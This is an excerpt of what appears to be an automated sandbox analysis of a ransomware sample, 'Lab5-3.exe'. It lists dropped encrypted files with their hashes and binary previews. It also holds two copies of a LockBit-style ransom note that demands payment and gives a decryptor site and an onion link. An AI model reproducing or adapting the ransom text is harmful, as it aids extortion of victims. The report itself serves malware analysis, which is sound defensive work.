                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.9248919975830034
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ejYhIvmrB5TF/L8HfUTid3hBaUoSGFcmeykEdEElU92i:PhIvYDFvGx0uKeY2ElUJ
                                                                                                          MD5:C21A021F2F4749DD082C3305DD5EECDB
                                                                                                          SHA1:B63C03E9C9C335C3B05AC9E161D1DA9368AC1732
                                                                                                          SHA-256:589E0198E9B15E6405A7B691B907B5CB77BBBD37EF6789287A07D93F920B2368
                                                                                                          SHA-512:5507EA02CDC8E2706C2F39D08DA702ECF380ECF02F86A09958851D7BCE8A51AADC1B369669F67BB8B2B603AFA2BFF385D31B18E84EDAE6405270E6A34E1629A0
                                                                                                          Malicious:false
                                                                                                          Preview:=.)yFP.......y....U.+@..y3....N....\.,S.q.n.d.$.\.....".x........t..".x..C...S4[...D ..+....).)Z:.>X....(.C.A..D...H.bt.....(3f.1vtf7.u..s.N.X..m....<vZ..<..J.`=....fs...Z....U..Ug..*.....sa.<E...^61.K[:.........w.;.P..|{..X.h.T_.....|6..&.B.....t...B....~........BA./VHH.E..,....#.I.)D..*....(Z4..{...j.}.^.2.@[D7.......r.........9.<......A'.....6H.}...V....S(..Z.....^.>..N.B.bs[.`R{R...c...M.r...I.5(~.L.!..u.j.2....x.[.......{.S.c....Q....).2.w..9?...M..m..%..9..%Dsl.G...N.I...<r1r...8..JM.m...;.......l...........1......./%.....O.._{@..n..C.8..c..cd..xP3.e.6[*.. e..s.....,.\#e.J.`....0...l5.m]...o.....''._..d.H ..y!jR}.K......].......~....I....c.'......wDl...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.91297477449895
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c/mXLYQES7MrXHfUTid3hBaUoSGFcmeykEdEElU92i:c/mbYQb7Mr8Gx0uKeY2ElUJ
                                                                                                          MD5:BD995CF5BA464561603FD86438122A66
                                                                                                          SHA1:F1575BA891EB1577DCA88B6B506A7995B894F89D
                                                                                                          SHA-256:D7AA1E8DCF52F8C355FACA32FB63728F52CA5D2175962AD0F113071CA4B9709A
                                                                                                          SHA-512:E60486B353C11E6FA3108D7CDD1E3B8F286979096D8EB7457E20A7F161AFBA41C445E85E24A642C66FB0C2660DCBF10281FF604F911C51389332C52E08C03F78
                                                                                                          Malicious:false
                                                                                                          Preview:\..7.u..Q$..t..-....c.uY..U+8 .S.l....[..YKo..5oN.z....f...6/.PZ.3....MM...~.kXZRR..i.f..p.x.t.x~..@p..S.~..5.I......S.......[.F.&.......D.v..XwD9.....i......7..<[N.K........y4h[..hM\o..].:.....i.Zy....u(y....xG9).XO...4......e.b.7.S..!...r_-.Q.A:x....z.K...y..S&.'.^.w.fF3.N..e4).....3....^l<.V..0......5m......L..c..Z.M.Q.8.b..U..)......ZU....`.y.i....P..(......l..2..BZ.ci. .[[`....Z...\s..c'..@.\..l.......=.t...v\1.....4`..a.u....p:.....n...db.bPcT..by.....U.#-i..0.q.~.R>...Y6,..~...g.d#.mF.]..E.;.-..u.....[g5.0.`.){...1...E....DXy..Z........1&.#A...mS[...B.........?......!.x..wb....T[xS..X*..M.B.?.Ah.B}..........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.932340333575061
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0ljxgcEbPNsrwF8Jmta1GAldTq14HfUTid3hBaUoSGFcmeykEdEElU92i:0ltwbPJIfUWT4fGx0uKeY2ElUJ
                                                                                                          MD5:40D316BEF05B35E5B7AB17181CBACF8D
                                                                                                          SHA1:9F7BFB178AF5EF8850B3110B6A0DA9D4CF34C553
                                                                                                          SHA-256:0DF14ED7FC83F25DD85A22BD6B174E13C8DFE2752C5F1B4ADA168F5D3C507853
                                                                                                          SHA-512:401638F014EB78B7C0F764C8A1D99A443B2855DA24D9E723BB97150DEB26083B5B9A2D4F7EDC2FBBDF4A62250C8F94032BBB5AE89C38975328D465D080061FFB
                                                                                                          Malicious:false
                                                                                                          Preview:s4.C.Y...)...R.F\.... ..S...Z.u6.........02[M..z...*aI..Ay..$...uy.Q&.>I..w.x.z+..[..n\....XUS.%a........9k[.g..@..(...QZLj.n.|s.......;%VU....G.T..mV.?..6..9."...vC.........{..m...ve..Kl)%;I...R.....c!O|..T.4.@..B..........s.+lG.Xu.:..(E.J.$f...j&lR0.,..X.7.e..}v.I..].....a....[....C.&.3>d..fe^.m.`.....;.9).,.k?..O,..X@..@t\8Y.?..._O|.|...2-.i.K..j(<}fy....DW/!}.Y..=!.)b8.7d...-$Y#.......KJ.W......K.N....].G..+V..*.yB`v..MH..C.,..i*..\<E.....bxsKoy0.c;....h........n.l.mP.a.6GO..........[.GM.C.Ga..R.....!...).._...$.'....b..zd..n......(+..-..G....M25.Tx..o.... l...:........%..c....{..K.,..L.m.| .4fn.A..D._.DH.[..L^=.[{....2....Y.....7...I..h.95.h.Z.@v}I.b..O-i.S%..^....;..K.UD.|.S.Z.0#... ....=....Y.........x.cK.*.x....\.G... .v...2....U4..*._.H-.T......Q....9"Z..a..........-X..B..*m,;j.tn.hf..C...L..=B!U..............vE.gv..#sc1....,.B21..@YT).f..twqL..%..9n....Xw..7=/d'.q>.B]K.QgQ...Z&.}.D..~0.v.....Q|.\"+..&..Nv.G...."zC=..)....lH..}.^Q..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.93360276785509
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:k0wKGdKQkeRVDUFHi3+p0x7xWga2H5WYHfUTid3hBaUoSGFcmeykEdEElU92i:gwQkeR1UFHiup8QGx0uKeY2ElUJ
                                                                                                          MD5:4A99C0ECDAC8C945C343D26BE700DB75
                                                                                                          SHA1:70EA6960CF40C262D1B80B035B5968525AE1DDE6
                                                                                                          SHA-256:B0FA87BEA47C7F5F544211952490CC67BDDF669A4939770A7B5C39693B12975B
                                                                                                          SHA-512:AE1EBFCF82740549E2E6C0417518306FCF0D3BEED77DA7F82B12B7CD0D6AB044B3A6EEFBFA5D5BC465D49D06362DDD83DE753FAE5523BE0DADC30E0A7F5DEC2B
                                                                                                          Malicious:false
                                                                                                          Preview:..._*4..2..._.U.z....*...^...5...i..:.W.......S..v_K..N.....U...V..c7~.>.apbm\O.n..Mz 0.a.W.A...K"..:.I.2.g.elF.F..S].#..iD....:-n.a...uU..E.#.......1../...P..8..:.~3.%5.+._.d.....,....I.=G%/.K.p...VV*.k.*...].N.0.]s.....[...c.p..)..0....*)....^......-#N.Li.j.i._..O.}...,....C......"...C..l.(_.a.3.~......k>.+......O....6`..p....t.M.U........f.4.....(....H.5..../.aK...y..s.....M]..B.l.$....].5...%....P.-p\'$.^T.Iu...x..K.N.{>Q...h..8rv.?..2|}.ZN.5...W..|...!..<Y.U...=..%....!0'vp.:re.K.1.g.1.K.$!.....;.........GCh.u....KW.......&....S...C....m.?.8...]...6.....5.......|.TR.p.,Y_)..q..d......R.g.r.p....@|(U)`x6o..5>..3.....Sv..~...h...N.;f[o......_JS..QY>h^....8}Z.b.b......>...+.N.^*a.C...."|.XB.A.g.....Bd.#.(.a\J....N.y.3.....6'*.LI......j.B.}..'A~...........Ie..%.....$.C.H;..G.=.|X8....J..|...,.:.).i.[..d..y...'n.n.#(........+hA....'..I.d.qI.........d..o.,.^li.e=T.H..._!.-.)T:.....h2..aU?,=...1(.j!G.f.OD..l..25.....+.&..1.@/
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.928857985843975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yTmepSbty2v4qdgWTHfUTid3hBaUoSGFcmeykEdEElU92i:ymBT4qdgjGx0uKeY2ElUJ
                                                                                                          MD5:7CB3DDA680F8E8B86BD72822469BE97C
                                                                                                          SHA1:BDAF77790670EF439CB8833BAAA763ECEE09BC89
                                                                                                          SHA-256:467CA0755E295F4C2909959556DB9E23F8AEA86BA16481F8D04A038865A6BE2C
                                                                                                          SHA-512:F78FDA0A85107CCA2A1E48E9F25503A5373A7CA42B3F5E3A64CC9ABD199DE0FD302507C1A34C7658657F53F5288E34A730506AEBE09106BBF2A9739077B536E0
                                                                                                          Malicious:false
                                                                                                          Preview:.....$RZ.....d...]$AX...p[i....u9R.V...V..T.s......G..I.S.G...p.!Y.z.......C....%%...J...x...Sl.*..]...}q63Q?....9..H;...S....1.f....8&".s(...|}.&.........t...rz/..[t....Ec?............F.A2.....{.q'.+.%.X...oC2....*...t........,....C..x.GZ.{LF.a.=.....u-r@.a.|....ST./.c!.]\..... .r./..Ya..J.3....X_.,..3CR...).O.....9#.P4....v.)kp....A.Eqn.p.....P7..~......x,.....`[.q..m.O.E.=....l..eZ.4[V.B...Gh......"A.....U.0..........?..'.".-.2.MG.+..2.H....)...Y.:.S.rf.r.1.....<n..^.....v......`.f.....F....&........F.y..p..#Z...F348..l.(.....U...#\.:.b?...R=u. .c...N7.........R....\c...M......J$s...Rb"V]O.*.lA.....|X..T;.j.?.Y.&>Jm#...F.i((......0...O....p..=...'..y...k8.i....,/.'..*....l.W.)....G....y>..5Q.4.IQ.........4.._.?...._.j.\......[.....(*.FSXV........{Jr.U2.Aj.....g).n.3W.`R...$Q+.y,..(.BQ..=5X+.l.i...?.':.\...S$u_..j.R..h.S@{1V..$H....q...D~.._..... .16..kp......8..7.-{$.+..8o.B...,...t.l|g..i._6j:..J..Wu......{...<;..!..NB..9.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.923829341690105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9hK89D3RauV4cG1c6+U6IVNd1hEsHfUTid3hBaUoSGFcmeykEdEElU92i:9hL3R/V4VJXrNdYrGx0uKeY2ElUJ
                                                                                                          MD5:FBB5B53A761A37E066E2E3516BF1B42C
                                                                                                          SHA1:9EDEDCA539D6084DCB3B668C726572038CAA85AB
                                                                                                          SHA-256:1598C88662EFCB143FDC2CE2336DC8FB533A4DCEBB074B9B87FBDA22E40A884B
                                                                                                          SHA-512:24AD85E034C2E7A5B97071786A9F73DE052086A433FEFD21654F1546B3B961C9F1F0C0419EC35AF2DDB3776245A9CD16900DA0FE509FC8B22EE000AE879F31C7
                                                                                                          Malicious:false
                                                                                                          Preview:..c......Cb.....vW.m.U..7?QfPC.][...s.8um[v@..|..)..C...>.v.v..j..^.v......q.J]..|.GS<.EA3....w...7...h.....K..5.R?....N.;........1..R?v.8K....~}.i..m,$F5J...`c.h.0..d.[.36...tx..(.a..D.&G...`....\...;....@.w..X.)%[oc.4{..+...s?".0.A....0..IV2S.F...#x=...vq..C.....z..&@@.....Q.....+.....ZY5. ...U.La._.1n.!......_.M\....'.......dc..!.`F[.....Hkz....(.."L.(zDCy ...o~l..u....@.1IBN. ..'#7..P.3I.n...%5.7..sh...8.~.9.n.]v..O.r.......m!.i...bI..._5*.....^+.a.^(....[&3....|sb.....f.a.\..gQ...B..pH....O..._...../...."......<$....O..J..@.$.......U.k.......v.N.r*.8."%.Lnk}...n.(5.....Ne....Eh}......>.X...S)..m(.....D\.E".......*...$..v.M..S.....T.5Cs.A.1..5j.4.]"p.G....Q.....oN.....ML.>../?x....hk.I.].1[M{..]. <...t...Y......>......B.....~...)C...m..+].e.n.`h.....X`N..`.......h.M..A.>cI.%.nu.q.@HmX.C...4z...Z.s.\..'..\}...*0......M.k9........`..Z52:].y......F..'.........?..F(....{..."IW5..,Z.rg ..D.\.'z...F....\g.@iC..B.?i@8n.m......nd_..H.]5^W.R...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.94218440965636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KyoRj+QKm8ObuSAjc81lM41YS925PHfUTid3hBaUoSGFcmeykEdEElU92i:LoIQ2Oia81lv1fIUGx0uKeY2ElUJ
                                                                                                          MD5:AE7457E0FC386DB8FF6C09E96BC89C8D
                                                                                                          SHA1:75502A5D4ADFF78EF4A521EB3D379B19545F80FB
                                                                                                          SHA-256:08099E9E028C3E679443010F0C6AAA563B8BECEC86AC71AF9F72AFAC71AA5638
                                                                                                          SHA-512:47DE61660A6DC2FBF2DA379DC836F963A4F6AF5EEB183909E96FD5527934AD651F7BBE405894F279D935C37E5C6F1C2F6ED2DF62CDD7E77EC3798DB875C5CAEE
                                                                                                          Malicious:false
                                                                                                          Preview:.l..../...GU...*!.^U...I..q+..6.....@.d]%8]..M&P3.....-8q.uP:./.F.M.....6..ej.9..]=..T..a.k.?..t... ..].$.0)..].Nm+.)....5....9E..e...4g........~..&A..gX..*.l&.F..BI...5.H"Q.=j)...07Y..+....u.l..U....Z:..e\.88....\OC..)...x+>..h....=8...g0pL.C}...F.5.n..u....='R...........is.s..h..5e.qY...FA..(.7.N._..<.......9.T.v4..7....k2..nI.~h...^@..P.+>...r.D......c)....l......R..Z..i...W....g...t..........^>v....G...eX.[#+...F..}.|.A7+.k.Cd.....uE-...8.J_....-"2o.I...a.....\.QfYJG........B.1~..".3..^i....h..tQZ......K>3..].p..`.$$...H........<:L:s.UF........>$#(.6..C%....'.E<.J..."N....H.4..}.=_....R...(_:.1..l.......Yq...-g.~...$...;..|.?...}......q..k.<..E..S.C. ;."|.fWR}...<......'}....z.89H...D<W....~.....=U..+0.k....R....lN.....L.BM.....0.*.&...*d.a.=..8Qx..I.'8........r....?l?.sH.....+.]...%.c6........g...j..S.zP!..........m<G^..x.<..K.z......E......u..{@Xa..o...h_......Q.'........!.... ..u........m...$.u<......../....eK.v.......y..R.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2848
                                                                                                          Entropy (8bit):7.946594075539153
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BQLVa55GMxAQ824mmdDAGwv8O6dHfUTid3hBaUoSGFcmeykEdEElU92i:aLcmQ8CmpAhGx0uKeY2ElUJ
                                                                                                          MD5:B6B904945657E2AC82AE8C4F29E1BCA4
                                                                                                          SHA1:7520D59870052EFAEF4F1733D8C3ADF610EB685B
                                                                                                          SHA-256:05CD62B90B1549B216EB8407F3DDBDD00DE0CC5CCCB59E03941F612A1AD94160
                                                                                                          SHA-512:B5D175D6095A0B92A439BF3E34D7A2E8E03E95DF6188D781FAE1E44FE03A2CBECCCFFBDA361149EDD0416ED0CCEE4AFE2C50B3753921216BF8D226F255E0BC09
                                                                                                          Malicious:false
                                                                                                          Preview:[RE..?...ioF.h..y..NS...4\~B..%*._......,..W.9.}_6.=......{O'...a8.......q..W(...z:!.>U..^...;.....H.............v....].T...6....../....Q.6.[..T.Hv...U2....u....22..wr....c\.@Xt4X[...R..D}...V..:.d.......y...hf...%.\.B...!/.../.@`...#.W.....".".u.Y....|6*$x.X.....$........T....jo"..S...@.2..Eh..8.)....0gNt..'.t.@.h...-.B.....1.-.:..r.4......x.r!.5....K..1.\L.{.Q..Q.I....~.hA.7.3f.8Vy....G...p..%.U.;..M.O2....gm7/....Jz..0eSG..G[..H..p....;.Z.../Z..g....w.........Jx.7;..E.J.@j&9....>....$..}+..fx..%"|.p`.......;v>.L.eJ*.k..5r........X{.2v5_.TV..q.iQ3C....&.w.Ay.k...z...Xm.fG..J.<....5j......y.*..j..M.r.Ncvg......V[...$0.Y.L...d.2v.,d'.~..i.B....G.......K.s8...l..........0Y..*./..B.Q...2qs-.4C..;vk..4..78$3..-.......IH..D{d..?.^.x{.(.PlT..0g..6..Uq..!...-.f(.a+x..W{l./_..r.f.p.G..<bu.1wU.?@RMq\L...1.OL.}.S(q.R:.iu.,|..@.K.27.G...pT.b....?8.O.....q.4{...%.|*.-.Y....,...N$q. a.O................ _.6.k..TI...8_...s.'4.....oMAN)..."....*TN.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.939535538834884
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ikwSsG2d8uG7wFe8DpHWjCi891ie+4hHfUTid3hBaUoSGFcmeykEdEElU92i:vnsG25Dpw7Gx0uKeY2ElUJ
                                                                                                          MD5:D1236F202557F10CD65FCA7642C58E1D
                                                                                                          SHA1:ABCA189A4C575BB9B91317E075ABABAB4D406F7E
                                                                                                          SHA-256:44771AD74F889E745EE5404491396EEC49956195F437686275E16CBB0A225DDF
                                                                                                          SHA-512:85B26C30CE623A7472077ECEE99A54BE719F261AA39D584D697703C4F0A26C05130ECCE4572D75AF8622E33A75C98A48521D8638389D06A8C1F1B9D29BA0F42E
                                                                                                          Malicious:false
                                                                                                          Preview:E..F#.0.D. c9..J.....^.J.F...T.r.;..P..f..5.MZ$...U..U.ZpdCq.U5Y.j%...#..Q..I.FK.Z...H...f....T....\A.MF.aa.T|;3V.'.>..1x.^..Q.2...#.#.7....3.rL.8...i...w.u.w.....w.|.j.=.....![.?r(.h...3....=...w..".G..J.nR>..S...]..G.g...R....@A..O.9...L.;.j. ..3Q.VE.d...Yt....,."..b6Qo......s.T,9...:B.....]h.u.....7_+....;>.6[......].[.$........6.F...l=9$L?b..!..~G......=....#.v..s.v;...NHn..KS..w...a(~............S....V..!(.C....f......{%.t*9].....f.`3..Q[.l...P.2..>@..D..O=SsY-.......9.a.?....@.M...np[...).....E...SY..&1?3..f`....`&d,.7.j&?.z.....e..G9....4Wk.....M..Q.....X5.mvG..\.$...c:..........57e.p(`$D........!H.p[.#>....r.v/..1m.eA..=N...w5........4S.Q....../......<ot....X~b{....&.D..w.D.x..-.M....q&2.....O.ho.W>..w..3.LW.%..uZ.]..h....H...hB.Z.%.Z..#P...d2..xmU.}.vg..Dh!Tq..[..S`..3..C..k..o......hZ%.y.O.Ee.S...S[XK..+..E.....CM$..f....Q.J.)_.......G.L.j.o.m.T.t...<9RQ...]..U.D.2S0.d=qd#..............{..EM..u...;...+..,...\.?`.f..4...K>-.,...b..\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.920958296810127
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Z0ZWlYXTx0tqay0wy803UZvU4bpUYk1991EVHfUTid3hBaUoSGFcmeykEdEElU93:kqYXTx0tqt7B03CbpRk1njGx0uKeY2E+
                                                                                                          MD5:9D781A06CDEA50D48AB1A94779483B38
                                                                                                          SHA1:1F275208E753C3AEAF7E77E91BA1B9832F4E2DA5
                                                                                                          SHA-256:A81B672855603916C74F723D2169916C892AF5D73BDE4446ED316A6EAED18962
                                                                                                          SHA-512:5B151A7563B049B322CF3EC446648A4BADB3F1CE799DA38DB4DF700E879B40310166942FF37AD4B04DB76909420CD88DCF4F874A83AE6DB79C33F9BAED59997A
                                                                                                          Malicious:false
                                                                                                          Preview:....A<H'l....>..S.^;..~*[.cX.r..`....0...m.r.^.o....4.... )&5G... h_....p4..... r..'yA..(..Xr..{.........4...Z........B".l.........|..{.WZ....D..p...~<.k.J$i<......A...8.8.g.^.V....D...e..&..[.q...a.......Bq.G.0.I5..r>...=RQ.Iz.B%~....;..O....f........}W!..p`n..Kk...........Z..L2.......{l.H..;4..6.~..Be6...k...(8.c...H...._.4.9sRj;.~.1./..i..&...K.1..1..Nq....+.....KaA]..<.......v.{..y.<D.....I..n...9!5..v..c.....t.f..qk.R...+o...~....*C....Z.x..a-s.y.\Mv......T.C.*K...k.\.M..%..A.l.`..................6=%..!.M.......(.Ey.....!i.z...{. 7.+...z#T.gE.......%..Ug.d..95'...C.....D.KoYW.Td1...k]..c3.hb;..u.wF...9.#.4.`.m.X1..!.sT..^.....'.W]o&..2.....*.0.zlI.....j.Uh..PH..[o.f..D.2.../4cn......."..9R...C....wl .U.s+...p.......R.y..V.~/..;.ED..J6.f..p...Y.wK.R.|L;..t.5N.%....h......z.2..3))...,.jS.t..A..R.=.......i!/H..NXA1.".....1...7....c..c8."..o......8J.-......I.J.;..A...P.#.|...uE.k.dh..{..s.}..a-a.......1D_3..6.y.x.....g...e......B..!..U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.933126472353183
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pj2TARqvKBXx80mFWULhZ51iQzsn+qHfUTid3hBaUoSGFcmeykEdEElU92i:pykMvK13mFWSZfHAnEGx0uKeY2ElUJ
                                                                                                          MD5:C548F5B5E044F63E383350DCCE5A3717
                                                                                                          SHA1:CD6D78C3BD187B24C3C6D6528691ECC61B3D7B1B
                                                                                                          SHA-256:FFB9613A9105547429119373D21BFD3E03D7FCB029D9CF135DFDC69C8D3662F5
                                                                                                          SHA-512:90E0AA43A15562966471AAE99C559D06FB98B793D4870559E7DB31B75A2B732EDBC8B9FA86DB6A4ABCF26E17A0D9FEB3D28E8FFAE051A03D8E226EA9584776A8
                                                                                                          Malicious:false
                                                                                                          Preview:.9..!.6...O..F.+`.&...IN..s+..^..2...(.....-.?.lZ...fb..0<}......h(...o.6a.."r.H...NY.>S.:^I..8.K..d....V1..f.."....ubx.c...x......#<z.g..).F=.F.d0Gv.g..7.../..V..;..T..{..D!..G./..M...#......!l.*aJMr..1o.>(..R.0.-.D...&..$<..Qhe....qn...H..9.#"...e.78.....0$3.{2.....}...s. qz. R...s!..0.<<......6..l@....X.%.....3?T.....K,V-.\../..{....e..S#..........g:@U..Zc.F...g.....I....o......$.....A.6..c.n.....pv.>w..wL.$J7.. .##m,.%C.......~7.E.(1w...|...@f..uD.t.h):U..:..XA..?...7I..B..I...:n.Vz/.....]..,./...jiNz....~,..Vf..{)..y.ST.{.`t.Hg...@^..............i...g.$...$.....e&0../.&.u........}......Ub.m&Va.?.s.W.J.......@_..U..z;\,..Sl.....x.....f.VW_.S../.........t Q..=T...`H.M.Y!%."...Ix3.....`.?~.. $..V:3....4 #..h....|.*ue.t.<...nIA..h.|..h'?s...co+..=..z.z@..C$.!&.q.....d.3.cIJ..Bt..d..B....E*.r..K._.|c'.&*.n.#..6(..1....:...pm,Y+.v^).I.eam;../....o.e. .Jw....Hx..-.U...qr.H....."=.o...-.#.^....(:..]<...rn.....q...`..&.a..I.+Ch..5......vu.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.934204078178308
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:04npo/au0PXDcaHxigfx3Oi2/nFksHfUTid3hBaUoSGFcmeykEdEElU92i:04por0PXDcaHxiGPtGx0uKeY2ElUJ
                                                                                                          MD5:BE485A012E4B5F437C49F121FFD23FE0
                                                                                                          SHA1:AD08CE437C010A6D8D81B7319E651FF581F8FE6D
                                                                                                          SHA-256:03219C50495197143843062731684AC37189DBB279198C93EA69C96D0C6300DC
                                                                                                          SHA-512:032ABDDB331EDBFAD1C175F6131B1B7F073E65BF2D0AB2454DBF682F0F5EF8591EAEC119F5B28E6E8F937DBBF072F4A6B333B973CCBAEE0A5D0C68960EC81F94
                                                                                                          Malicious:false
                                                                                                          Preview:...3.P..1.....a.M%.n...d..S.2.....'.X...S.;&.. ......F.3.'.X-ea.!L...w..+6-..*.. ..8.t...B.L.M...............o.D{w...c.[..{;*..FZ.....`....>..t..~o.x>;~b.MU..,.Px.Bj.W<.A.... V.".H..&...4.....J)...%.c....-.....MrF.CJ-.3$=.v.ji5...._..<.y......)2x..va......4.k...B.Ajg..6+..f..O.....P<..3.....(_(c,..z*..).L@..'@..Bya..*N....1.C[.7..).l.....m.J|.v0.a..K`..V.......8.:...ZF..(.....X.NVv..t..l...z....?..us:........X.........#.C...L..5.k.:O.r1Gt=SI..x4%..b&2.5G5../.......x.y.r.r!....\+.......B..C<>..7`;P...8C...+3....K.q....f......Hg.&.~....o@.......W{...K....mf.c^...l..7"{.......5.7xc.@.>E....!...Z|G...2.....r..#...c.,DRf.s&..........-....."{.....c3...D.(.zMDP...Q...)F..Q....Y.. |C.....!J.....Z..`........Ll..A...r2....|._.W'.?.....G...9..;...P..........2..`R.F*...2Y...Ol.O./...._W..F..f,{.G.................}WZ..... y...a.E...:.gW...p.....M....#..4...v}.6Why,..wZ|..Y..Zf4...~.j..QP...'y.pw6..e.,Vk..l;\...]...s...}..v~..fB......T...q....s...$.?}..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.938196186176006
                                                                                                          Encrypted:false
